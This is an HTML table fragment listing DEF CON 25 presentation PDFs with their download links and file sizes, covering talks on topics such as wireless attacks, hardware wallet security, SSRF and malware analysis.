&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Cincvolflt-Inside-The-Meet-Desai-Attack.pdf" title="DEFCON-25-Cincvolflt-Inside-The-Meet-Desai-Attack.pdf"&gt;DEFCON-25-Cincvolflt-Inside-The-Meet-Desai-Attack.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.8 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Damien-Cauquil-Weaponizing-the-BBC-MicroBit.pdf" title="DEFCON-25-Damien-Cauquil-Weaponizing-the-BBC-MicroBit.pdf"&gt;DEFCON-25-Damien-Cauquil-Weaponizing-the-BBC-MicroBit.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Daniel-Bohannon-and-Lee-Holmes-Revoke-Obfuscation.pdf" title="DEFCON-25-Daniel-Bohannon-and-Lee-Holmes-Revoke-Obfuscation.pdf"&gt;DEFCON-25-Daniel-Bohannon-and-Lee-Holmes-Revoke-Obfuscation.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.9 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Datko-and-Quartier-Breaking-Bitcoin-Hardware-Wallets.pdf" title="DEFCON-25-Datko-and-Quartier-Breaking-Bitcoin-Hardware-Wallets.pdf"&gt;DEFCON-25-Datko-and-Quartier-Breaking-Bitcoin-Hardware-Wallets.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;799.3 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Dhia-Mahjoub-and-Thomas-Mathew-Malicious-CDNs-Identifying-Zbot-Domains-en-Masse.pdf" title="DEFCON-25-Dhia-Mahjoub-and-Thomas-Mathew-Malicious-CDNs-Identifying-Zbot-Domains-en-Masse.pdf"&gt;DEFCON-25-Dhia-Mahjoub-and-Thomas-Mathew-Malicious-CDNs-Identifying-Zbot-Domains-en-Masse.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;616.5 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Foofus-Secret-Tools-Learning-About-Gov-Surveillance-Software.pdf" title="DEFCON-25-Foofus-Secret-Tools-Learning-About-Gov-Surveillance-Software.pdf"&gt;DEFCON-25-Foofus-Secret-Tools-Learning-About-Gov-Surveillance-Software.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;69.2 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Course-Guide.pdf" title="DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Course-Guide.pdf"&gt;DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Course-Guide.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Lab-Setup-Guide.pdf" title="DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Lab-Setup-Guide.pdf"&gt;DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks-Lab-Setup-Guide.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.7 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks.pdf" title="DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks.pdf"&gt;DEFCON-25-Gabriel-Ryan-Advanced-Wireless-Attacks-Against-Enterprise-Networks.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;7.4 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdf" title="DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdf"&gt;DEFCON-25-Gerald-Steere-and-Sean-Metcalf-Hacking-the-Cloud.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.4 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gil-Cohen-Call-The-Plumber-You-Have-A-Leak-In-Your-%28named%29-Pipe.pdf" title="DEFCON-25-Gil-Cohen-Call-The-Plumber-You-Have-A-Leak-In-Your-(named)-Pipe.pdf"&gt;DEFCON-25-Gil-Cohen-Call-The-Plumber-You-Have-A-Leak-In-Your-(named)-Pipe.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Gus-Frischie-and-Evan-Teitelman-Backdooring-the-Lottery.pdf" title="DEFCON-25-Gus-Frischie-and-Evan-Teitelman-Backdooring-the-Lottery.pdf"&gt;DEFCON-25-Gus-Frischie-and-Evan-Teitelman-Backdooring-the-Lottery.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.7 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf" title="DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf"&gt;DEFCON-25-Hanno-Boeck-Abusing-Certificate-Transparency-Logs.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;250.0 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Haoqi-Shan-and-Jian-Yuan-Man-in-the-NFC.pdf" title="DEFCON-25-Haoqi-Shan-and-Jian-Yuan-Man-in-the-NFC.pdf"&gt;DEFCON-25-Haoqi-Shan-and-Jian-Yuan-Man-in-the-NFC.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.3 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Hernandez-Richards-MacDonald-Evoy-Tracking-Spies-in-the-Skies.pdf" title="DEFCON-25-Hernandez-Richards-MacDonald-Evoy-Tracking-Spies-in-the-Skies.pdf"&gt;DEFCON-25-Hernandez-Richards-MacDonald-Evoy-Tracking-Spies-in-the-Skies.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Hyrum-Anderson-Evading-Next-Gen-AV-Using-AI.pdf" title="DEFCON-25-Hyrum-Anderson-Evading-Next-Gen-AV-Using-AI.pdf"&gt;DEFCON-25-Hyrum-Anderson-Evading-Next-Gen-AV-Using-AI.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.6 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ilja-van-Sprundel-BSD-Kern-Vulns.pdf" title="DEFCON-25-Ilja-van-Sprundel-BSD-Kern-Vulns.pdf"&gt;DEFCON-25-Ilja-van-Sprundel-BSD-Kern-Vulns.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Inbar-and-Eden-Story-of-Early-Israeli-Hacking-Community.pdf" title="DEFCON-25-Inbar-and-Eden-Story-of-Early-Israeli-Hacking-Community.pdf"&gt;DEFCON-25-Inbar-and-Eden-Story-of-Early-Israeli-Hacking-Community.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.1 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Jason-Staggs-Breaking-Wind-Hacking-Wind-Farm-Control-Networks.pdf" title="DEFCON-25-Jason-Staggs-Breaking-Wind-Hacking-Wind-Farm-Control-Networks.pdf"&gt;DEFCON-25-Jason-Staggs-Breaking-Wind-Hacking-Wind-Farm-Control-Networks.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf" title="DEFCON-25-Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf"&gt;DEFCON-25-Jesse-Michael-and-Mickey-Shkatov-Driving-Down-the-Rabbit-Hole.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;10.6 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Jhaddix-HUNT-Data-Driven-Web-Hacking-and-Manual-Testing.pdf" title="DEFCON-25-Jhaddix-HUNT-Data-Driven-Web-Hacking-and-Manual-Testing.pdf"&gt;DEFCON-25-Jhaddix-HUNT-Data-Driven-Web-Hacking-and-Manual-Testing.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Jim-Nitterauer-DNS-Devious-Name-Services-Destroying-Privacy-Anonymity-Without-Your-Consent.pdf" title="DEFCON-25-Jim-Nitterauer-DNS-Devious-Name-Services-Destroying-Privacy-Anonymity-Without-Your-Consent.pdf"&gt;DEFCON-25-Jim-Nitterauer-DNS-Devious-Name-Services-Destroying-Privacy-Anonymity-Without-Your-Consent.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Joe-Rozner-Wiping-Out-CSRF.pdf" title="DEFCON-25-Joe-Rozner-Wiping-Out-CSRF.pdf"&gt;DEFCON-25-Joe-Rozner-Wiping-Out-CSRF.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;131.4 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Karit-ZX-Security-Using-GPS-Spoofing-To-Control-Time.pdf" title="DEFCON-25-Karit-ZX-Security-Using-GPS-Spoofing-To-Control-Time.pdf"&gt;DEFCON-25-Karit-ZX-Security-Using-GPS-Spoofing-To-Control-Time.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Konstantinos-Karagiannis-Hacking-Smart-Contracts.pdf" title="DEFCON-25-Konstantinos-Karagiannis-Hacking-Smart-Contracts.pdf"&gt;DEFCON-25-Konstantinos-Karagiannis-Hacking-Smart-Contracts.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Lee-Holmes-Attacking-Battle-Hardened-Windows-Server.pdf" title="DEFCON-25-Lee-Holmes-Attacking-Battle-Hardened-Windows-Server.pdf"&gt;DEFCON-25-Lee-Holmes-Attacking-Battle-Hardened-Windows-Server.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;290.1 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Marina-Simakov-and-Igal-Gofman-Here-to-stay-Gaining-persistence-by-abusing-auth-mechanisms.pdf" title="DEFCON-25-Marina-Simakov-and-Igal-Gofman-Here-to-stay-Gaining-persistence-by-abusing-auth-mechanisms.pdf"&gt;DEFCON-25-Marina-Simakov-and-Igal-Gofman-Here-to-stay-Gaining-persistence-by-abusing-auth-mechanisms.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;3.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Matt-Wixey-See-No-Evil-Hear-No-Evil.pdf" title="DEFCON-25-Matt-Wixey-See-No-Evil-Hear-No-Evil.pdf"&gt;DEFCON-25-Matt-Wixey-See-No-Evil-Hear-No-Evil.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Max-Bazaliy-Jailbreaking-Apple-Watch.pdf" title="DEFCON-25-Max-Bazaliy-Jailbreaking-Apple-Watch.pdf"&gt;DEFCON-25-Max-Bazaliy-Jailbreaking-Apple-Watch.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.3 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Mikhail-Sosonkin-Hacking-Travel-Routers-Like-1999.pdf" title="DEFCON-25-Mikhail-Sosonkin-Hacking-Travel-Routers-Like-1999.pdf"&gt;DEFCON-25-Mikhail-Sosonkin-Hacking-Travel-Routers-Like-1999.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Min-Spark-Zheng-macOS-iOS-Kernel-Debugging.pdf" title="DEFCON-25-Min-Spark-Zheng-macOS-iOS-Kernel-Debugging.pdf"&gt;DEFCON-25-Min-Spark-Zheng-macOS-iOS-Kernel-Debugging.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Nathan-Seidle-Open-Source-Safe-Cracking-Robots.pdf" title="DEFCON-25-Nathan-Seidle-Open-Source-Safe-Cracking-Robots.pdf"&gt;DEFCON-25-Nathan-Seidle-Open-Source-Safe-Cracking-Robots.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.8 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Omar-Eissa-Attacking-Autonomic-Networks.pdf" title="DEFCON-25-Omar-Eissa-Attacking-Autonomic-Networks.pdf"&gt;DEFCON-25-Omar-Eissa-Attacking-Autonomic-Networks.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.4 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Orange-Tsai-A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages.pdf" title="DEFCON-25-Orange-Tsai-A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages.pdf"&gt;DEFCON-25-Orange-Tsai-A-New-Era-of-SSRF-Exploiting-URL-Parser-in-Trending-Programming-Languages.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.9 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Owen-Snide-Phone-System-Testing-and-other-fun-tricks.pdf" title="DEFCON-25-Owen-Snide-Phone-System-Testing-and-other-fun-tricks.pdf"&gt;DEFCON-25-Owen-Snide-Phone-System-Testing-and-other-fun-tricks.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.9 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-DeSantis-From-Box-to-Backdoor-Using-Old-School-Tools.pdf" title="DEFCON-25-Patrick-DeSantis-From-Box-to-Backdoor-Using-Old-School-Tools.pdf"&gt;DEFCON-25-Patrick-DeSantis-From-Box-to-Backdoor-Using-Old-School-Tools.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly.pdf" title="DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly.pdf"&gt;DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;8.4 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Plore-Popping-a-Smart-Gun.pdf" title="DEFCON-25-Plore-Popping-a-Smart-Gun.pdf"&gt;DEFCON-25-Plore-Popping-a-Smart-Gun.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.1 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Professor-Plum-Digital%20Vengeance-Exploiting-Notorious-Toolkits.pdf" title="DEFCON-25-Professor-Plum-Digital Vengeance-Exploiting-Notorious-Toolkits.pdf"&gt;DEFCON-25-Professor-Plum-Digital Vengeance-Exploiting-Notorious-Toolkits.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.7 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Roger-Dingledine-Next-Generation-Tor-Onion-Services.pdf" title="DEFCON-25-Roger-Dingledine-Next-Generation-Tor-Onion-Services.pdf"&gt;DEFCON-25-Roger-Dingledine-Next-Generation-Tor-Onion-Services.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdf" title="DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdf"&gt;DEFCON-25-Ryan-Baxendale-Microservices-and-FaaS-for-Offensive-Security.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Salvador-Mendoza-Exploiting-0ld-Magstripe-Info-with-New-Technology.pdf" title="DEFCON-25-Salvador-Mendoza-Exploiting-0ld-Magstripe-Info-with-New-Technology.pdf"&gt;DEFCON-25-Salvador-Mendoza-Exploiting-0ld-Magstripe-Info-with-New-Technology.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Scott-Behrens-and-Jeremy-Heffner-Starting-The-Avalanche-Application-DoS-In-Microservice-Architectures.pdf" title="DEFCON-25-Scott-Behrens-and-Jeremy-Heffner-Starting-The-Avalanche-Application-DoS-In-Microservice-Architectures.pdf"&gt;DEFCON-25-Scott-Behrens-and-Jeremy-Heffner-Starting-The-Avalanche-Application-DoS-In-Microservice-Architectures.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Slava-Makkaveev-and-Avi-Bashan-Unboxing-Android.pdf" title="DEFCON-25-Slava-Makkaveev-and-Avi-Bashan-Unboxing-Android.pdf"&gt;DEFCON-25-Slava-Makkaveev-and-Avi-Bashan-Unboxing-Android.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;911.6 KiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Stephan-Huber-and-Seigfried-Rasthofer-Password-Manager-Investigation.pdf" title="DEFCON-25-Stephan-Huber-and-Seigfried-Rasthofer-Password-Manager-Investigation.pdf"&gt;DEFCON-25-Stephan-Huber-and-Seigfried-Rasthofer-Password-Manager-Investigation.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Suggy-Sumner-Rage-Against-The-Weaponized-AI-Propaganda-Machine.pdf" title="DEFCON-25-Suggy-Sumner-Rage-Against-The-Weaponized-AI-Propaganda-Machine.pdf"&gt;DEFCON-25-Suggy-Sumner-Rage-Against-The-Weaponized-AI-Propaganda-Machine.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.8 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Svea-Eckert-Andreas-Dewes-Dark-Data.pdf" title="DEFCON-25-Svea-Eckert-Andreas-Dewes-Dark-Data.pdf"&gt;DEFCON-25-Svea-Eckert-Andreas-Dewes-Dark-Data.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;6.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Tess-Schrodinger-Total-Recall.pdf" title="DEFCON-25-Tess-Schrodinger-Total-Recall.pdf"&gt;DEFCON-25-Tess-Schrodinger-Total-Recall.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;5.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-WP.pdf" title="DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-WP.pdf"&gt;DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions-WP.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.0 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions.pdf" title="DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions.pdf"&gt;DEFCON-25-Tomer-Cohen-Game-Of-Chromes-Owning-The-Web-With-Zombie-Chrome-Extensions.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;20.7 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Vasillios-Mavroudis-Trojan-Tolerant-Hardware.pdf" title="DEFCON-25-Vasillios-Mavroudis-Trojan-Tolerant-Hardware.pdf"&gt;DEFCON-25-Vasillios-Mavroudis-Trojan-Tolerant-Hardware.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.9 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Weston-Hecker-Opt-Out-or-Deauth-Trying.pdf" title="DEFCON-25-Weston-Hecker-Opt-Out-or-Deauth-Trying.pdf"&gt;DEFCON-25-Weston-Hecker-Opt-Out-or-Deauth-Trying.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.2 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Whitney-Merrill-and-Terrell-McSweeny-Tick-Tick-Boom-Tech-and-the-FTC.pdf" title="DEFCON-25-Whitney-Merrill-and-Terrell-McSweeny-Tick-Tick-Boom-Tech-and-the-FTC.pdf"&gt;DEFCON-25-Whitney-Merrill-and-Terrell-McSweeny-Tick-Tick-Boom-Tech-and-the-FTC.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;4.9 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-William-Knowles-Persisting-With-Microsoft-Office.pdf" title="DEFCON-25-William-Knowles-Persisting-With-Microsoft-Office.pdf"&gt;DEFCON-25-William-Knowles-Persisting-With-Microsoft-Office.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;2.8 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-XlogicX-Assembly-Language-Is-Too-High-Level.pdf" title="DEFCON-25-XlogicX-Assembly-Language-Is-Too-High-Level.pdf"&gt;DEFCON-25-XlogicX-Assembly-Language-Is-Too-High-Level.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;7.5 MiB&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Yuwei-Zheng-UnicornTeam-Ghost-Telephonist.pdf" title="DEFCON-25-Yuwei-Zheng-UnicornTeam-Ghost-Telephonist.pdf"&gt;DEFCON-25-Yuwei-Zheng-UnicornTeam-Ghost-Telephonist.pdf&lt;/a&gt;&lt;/td&gt;&lt;td&gt;1.6 MiB&lt;/td&gt;&lt;/tr&gt;
